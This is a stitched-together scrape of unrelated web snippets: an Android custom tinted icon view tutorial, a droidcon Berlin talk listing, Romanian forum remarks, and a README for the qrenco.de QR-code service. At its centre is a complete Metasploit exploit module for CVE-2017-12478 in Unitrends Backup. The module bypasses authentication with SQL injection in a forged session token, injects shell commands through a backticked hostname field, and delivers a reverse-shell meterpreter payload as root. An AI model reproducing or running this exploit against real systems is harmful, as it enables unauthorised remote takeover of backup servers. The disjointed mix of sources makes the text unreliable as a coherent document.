super(context); } public CustomColorIconView(Context context, AttributeSet attrs) { super(context, attrs); init(context, attrs); } public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); init(context, attrs); } @TargetApi(Build.VERSION_CODES.LOLLIPOP) public CustomColorIconView(Context context, AttributeSet attrs, int defStyleAttr, int defStyleRes) { super(context, attrs, defStyleAttr, defStyleRes); init(context, attrs); } private void init(Context context, AttributeSet attrs){ TypedArray typedArray = context.obtainStyledAttributes(attrs, R.styleable.CustomColorIconView); int color = typedArray.getColor(R.styleable.CustomColorIconView_dciv_color,0); setColorFilter(color, PorterDuff.Mode.SRC_ATOP); typedArray.recycle(); } public void setImageFilterColor(int color) { if(color == -1) { setColorFilter(null); } else { setColorFilter(color,PorterDuff.Mode.SRC_ATOP); } } } CustomColorIconView.java <declare-styleable name="CustomColorIconView"> <attr name="dciv_color" format="color"/> </declare-styleable> attrs.xml That’s it. Now to use this in your xml, create a CustomColorIconView and set dciv_color to whatever color you need. In this case, we changed the dark location icon to white. <CustomColorIconView android:layout_width="wrap_content" android:layout_height="wrap_content" android:src="@drawable/ic_location_dark" app:dciv_color="@color/white" /> layout.xml That’s all for this post! Will keep posting interesting snippets about Android and other things. Follow me to get updates :) Thanks for reading this article. Be sure to clap/recommend as much as you can and also share with your friends. It means a lot to me. Source

#droidconDE 2017: Garima Jain - Dagger 2 Android: Defeat the Dahaka - DAY 1 Almost 1200 attendees converged at the ninth annual droidcon Berlin co-located for the first time with IFA (Internationale Funkausstellung), one of the world’s largest consumer electronics shows in the world. Playlist https://droidcon.de/en/program/sessions

It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Unitrends UEB 9 http api/storage remote root', 'Description' => %q{ It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. }, 'Author' => [ 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted 'Jared Arave' # @iotennui ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86], 'CmdStagerFlavor' => [ 'printf' ], 'References' => [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], ['CVE', '2017-12478'], ], 'Targets' => [ [ 'UEB 9.*', { } ] ], 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]) ]) deregister_options('SRVHOST', 'SRVPORT') end #substitue some charactes def filter_bad_chars(cmd) cmd.gsub!("\\", "\\\\\\") cmd.gsub!("'", '\\"') end def execute_command(cmd, opts = {}) session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass session = Base64.strict_encode64(session) #b64 encode session token #substitue the cmd into the hostname parameter parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| parms << filter_bad_chars(cmd) parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ 'uri' => '/api/storage', 'method' => 'POST', 'ctype' => 'application/json', 'encode_params' => false, 'data' => parms, 'headers' => {'AuthToken' => session} }) if res && res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end def exploit print_status("#{peer} - pwn'ng ueb 9....") execute_cmdstager(:linemax => 120) end end Source

browser? vezi daca e de la Flash

ce Windows utilizezi? placa de sunet? etc..

Usage The service is used to generate QR-codes for strings in a UNIX/Linux console using curl/httpie/wget or similar tools. The service can be used in a browser also. Just add qrenco.de/ before the URL. The service uses libqrencode to generate QR-codes. Installation You don't need to install the service for using it (just try curl qrenco.de), but if you want to install it locally, do the following steps: $ git clone https://github.com/chubin/qrenco.de $ cd qrenco.de $ virtualenv ve $ ve/bin/pip install -r requirements.txt $ sudo apt-get install libqrenv $ ve/bin/python bin/srv.py If you want to use a HTTP-frontend for the service, configure it this way: server { listen 80; listen [::]:80; server_name qrenco.de *.qrenco.de; access_log /var/log/nginx/qrenco.de-access.log; error_log /var/log/nginx/qrenco.de-error.log; location / { proxy_pass http://127.0.0.1:8003; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $remote_addr; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; expires off; } } Download: grenco.de-master.zip or git clone https://github.com/chubin/qrenco.de.git Sources: http://qrenco.de/ https://github.com/chubin/qrenco.de

Cred ca ar fi util un Embed pentru https://asciinema.org/ in special in sectiunea Tutoriale